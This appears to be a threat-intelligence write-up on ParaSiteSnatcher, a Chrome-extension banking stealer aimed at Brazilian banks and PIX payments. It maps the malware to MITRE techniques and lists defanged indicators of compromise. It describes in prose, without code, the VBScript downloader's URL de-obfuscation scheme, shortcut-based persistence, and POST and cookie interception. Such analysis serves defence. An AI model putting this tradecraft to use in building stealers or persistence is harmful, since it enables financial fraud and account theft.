Keypoints
- ParaSiteSnatcher is delivered by VBScript downloaders (three variants with increasing obfuscation) hosted on cloud services and checks for chrome.exe and %APPDATA%%USERNAME% before proceeding.
- The downloader contacts a C2 URL (e.g., hxxps://storage.googleapis[.]com/98jk3m5azb/-) to receive an obfuscated list of URLs, de-obfuscates them, and downloads malicious Chrome extension modules.
- Downloaded modules are saved to the user’s application data folder and the malware enforces persistence by removing legitimate Chrome shortcuts and creating a custom Chrome shortcut that loads the malicious extension at startup.
- The extension uses a service worker (yyva.js) and multiple content scripts (sovvy.js, jsync.js, 33nhauh.js, unpgp2.js, s12ih0a.js) to listen for messages, use chrome.webRequest to intercept POSTs, and exfiltrate form data, cookies, and session information.
- ParaSiteSnatcher specifically targets Brazilian banking flows (Banco do Brasil, Caixa), PIX instant payments and Boleto Bancário, harvesting CPF/CNPJ, account and transaction fields, and can programmatically initiate/modify PIX actions.
- The extension steals Microsoft account cookies to enable session hijacking and cloud pivoting, and fetches remote commands from its C2 to update behavior or exfiltrate collected data.
MITRE Techniques
- [T1059.005] Visual Basic – Used to deliver the initial downloader as VBScript variants. Quote relevant content using bracket (‘ParaSiteSnatcher is downloaded through a VBScript downloader hosted on Dropbox and Google Cloud and installed onto an infected system.’)
- [T1105] Ingress Tool Transfer – The malware retrieves and saves additional malicious Chrome extension modules from URLs provided by the C2. Quote relevant content using bracket (‘Once the actual URLs are retrieved, they are used to download additional malicious modules masquerading as Google Chrome extensions.’)
- [T1071.001] Application Layer Protocol: Web Protocols – C2 communication and command retrieval occur over HTTP(S) GET/POST to storage.googleapis.com and other endpoints. Quote relevant content using bracket (‘constructing and sending a GET request to hxxps[:]//storage.googleapis[.]com/98jk3m5azb/-‘)
- [T1056] Input Capture – The extension intercepts and captures POSTed form submissions and user input by leveraging Chrome APIs to monitor requests. Quote relevant content using bracket (‘intercept and exfiltrate all POST requests containing sensitive account and financial information before the HTTP request initiates a transmission control protocol (TCP) connection.’)
- [T1539] Steal Web Session Cookie – Content scripts collect cookies (including Microsoft live.com cookies) and forward them to the service worker for exfiltration or session theft. Quote relevant content using bracket (‘Stealing Microsoft cookies… send this data … to the service worker, which processes this data to filter and extract the found Microsoft account cookies.’)
- [T1547.001] Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder – Persistence is achieved by creating a custom Chrome shortcut configured to load the malicious extension each time Chrome is launched. Quote relevant content using bracket (‘creates a Google Chrome shortcut on the desktop, which is configured to launch the browser with custom startup parameters… ensure that the malicious extension is loaded each time Chrome is started via the created shortcut.’)
Indicators of Compromise
- [C2 URL] C2 and payload distribution – hxxps[:]//storage.googleapis[.]com/98jk3m5azb/-, hxxps[:]//rezumdolly[.]com:8443/api/alert
- [Cloud hosts] Download hosts – Dropbox links, Google Cloud storage (used to host VBScript and payloads)
- [File names] Malicious extension and script filenames seen in samples – yyva.js, sovvy.js, jsync.js, 33nhauh.js, unpgp2.js, s12ih0a.js (and other module names)
- [Local paths & artifacts] Persistence and installation locations – payloads saved to %APPDATA%%USERNAME% and modified or created Chrome shortcuts (chrome.lnk removal and custom shortcut creation)
- [Targeted URLs/Services] Banking targets and payment systems – Banco do Brasil-related URLs, Caixa Econômica Federal-related URLs, PIX and Boleto Bancário flows
ParaSiteSnatcher’s technical procedure begins with cloud-hosted VBScript downloaders (three variants ranging from plain to highly obfuscated with junk code, anti-debug/anti-tamper, and random identifiers). The downloader checks for the presence of Chrome (e.g., %ProgramFiles%GoogleChromeApplicationchrome.exe) and a user AppData folder and then performs an HTTP GET to a C2 endpoint (example: storage.googleapis.com/98jk3m5azb/-). The C2 response contains an obfuscated list of URLs; the script reverses strings and replaces markers (‘[h]’→’https://’, ‘-‘→’.’, ‘_’→’/’, ‘>’→’:’) to reconstruct real download links, which it uses to fetch additional modules disguised as Chrome extensions and saves them under %APPDATA%%USERNAME%.
On installation the malware removes existing Chrome shortcuts (searching for chrome.lnk in Desktop/Public Desktop/Quick Launch) and creates a crafted Chrome shortcut that launches Chrome with custom startup parameters pointing to a default profile directory and the malicious extension, ensuring the extension loads on each browser start. The extension package contains a manifest.json that grants broad host_permissions and APIs (webRequest, scripting, tabs, cookies, webNavigation, storage, declarativeNetRequest, etc.), a service worker (yyva.js) acting as the central event handler, and multiple content scripts (sovvy.js, jsync.js, 33nhauh.js, unpgp2.js, s12ih0a.js) that together monitor tabs, intercept web requests, and perform DOM interactions.
Operationally, the service worker uses chrome.runtime.onMessage and chrome.webRequest.onBeforeRequest to listen for navigation/focus/getcookie events and to capture POST request payloads before transmission; sovvy.js polls pages, sets listeners, and handles message types like ‘lixo’ (catch-all POST capture) and ‘cookie’ (session/cookie theft). Other scripts implement AJAX exfiltration (jsync.js), banking-specific automation and PIX actions (33nhauh.js), Caixa interactions (unpgp2.js), and Boleto/CPF-CNPJ monitoring (s12ih0a.js). Collected data (form fields, CPF/CNPJ, PIX keys, account details, Microsoft live.com cookies, and more) are packaged and posted back to attacker-controlled endpoints, while the extension can also fetch remote commands from C2 to update behavior or trigger transactions.